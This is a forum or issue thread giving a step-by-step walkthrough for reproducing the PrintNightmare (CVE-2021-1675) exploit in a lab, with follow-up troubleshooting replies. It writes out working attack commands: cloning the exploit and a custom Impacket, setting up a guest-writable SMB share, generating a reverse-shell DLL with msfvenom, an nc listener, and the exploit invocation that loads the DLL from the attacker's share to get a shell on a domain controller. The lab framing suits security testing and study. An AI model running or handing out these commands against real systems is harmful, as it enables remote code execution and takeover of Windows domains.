How to Reproduce (Virtual Environment):

[BlackSnufkin]

This is how I was able to reproduce the exploit in a virtual environment:

---

1. The best practice is to create Python virtual Environment

   • python3 -m venv PrintNightmare
   • source PrintNightmare/bin/activate

---

2. clone the repo and install the custom Impacket version:

• git clone https://github.com/cube0x0/CVE-2021-1675.git
• git clone https://github.com/cube0x0/impacket
• cd impacket
• python3 ./setup.py install

---

3. Set up SMB share

• copy the original smb.conf file and create a backup file
  cp /etc/samba/smb.conf /etc/samba/smb.conf.bak
• now on the smb.conf change to this new configuration File

[global]
map to guest = Bad User
server role = standalone server
usershare allow guests = yes
idmap config * : backend = tdb
smb ports = 445

[smb]
comment = Samba
path = /tmp/
guest ok = yes
read only = no
browsable = yes
force user = nobody

• Spin up SMB share:

  impacket-smbserver smb /tmp/

In case you have some problems with the SMB try to use build-in SMBD service
service smbd start

---

4. Payload Creation:

• Create Reverse shell Payload as a DLL

  msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=<YOUR IP> LPORT=<PORT TO LISTEN> -f dll -o /tmp/rev.dll

---

5. Windows Environment:

• you need to create a dc with an active directory.
• create a low privilege user
• create a windows 10 as the client join him in the domain
• login into the win10 with the new user

---

6. Set up a listener

• nc -lnvp 9001

---

7. Run the Exploit

• python3 CVE-2021-1675.py <FQDN>/<USER_Name>:<PASSWORD>@<DC IP> '\\<ATTACKER_IP>\smb\rev.dll'

---

8. ENJOY your SHELL =)

---

Machines:

• Attacker: kali Linux
• DC: Server 2016
• Client: win10

[Followwind4567]

Hello,i do what you told.But it always show Connection Failed,what can i do...

[Followwind4567]

Shell i reboot all machine?

[BlackSnufkin]

sometimes the spools service get crashed make sure that the service is running you can use rpcdump to verify

[Followwind4567]

DC and Client all need to be make sure?

[Followwind4567]

But it all show

[BlackSnufkin]

interesting try to check manually on the DC,
if still having problems just reboot

[Followwind4567]

I use Server 2012 as DC,will it cause problems?

[BlackSnufkin]

basically no but if remember right I saw someone on Twitter claiming he had problems with that version

[Followwind4567]

OK,i will use your config.Thank you very mach, hope i can fix that before dinner.I have work for it 2days...(;´༎ຶД༎ຶ`)

[BlackSnufkin]

😄 it all good it took me 4 days until I was able to reproduce just try harder 😉

[MortalAndTry]

server 2012 r2 (dc) will failed with normal user

[Cory-Watson]

I think this issue is because of the hard coded shebang (e.g. - #!/usr/bin/python3)

Changing to #!/usr/bin/env python3 solved the issue for me.

[gg0h]

Thank you, my using the payload windows/shell_reverse_tcp fails. Using the payload you suggest, windows/x64/shell_reverse_tcp is successful.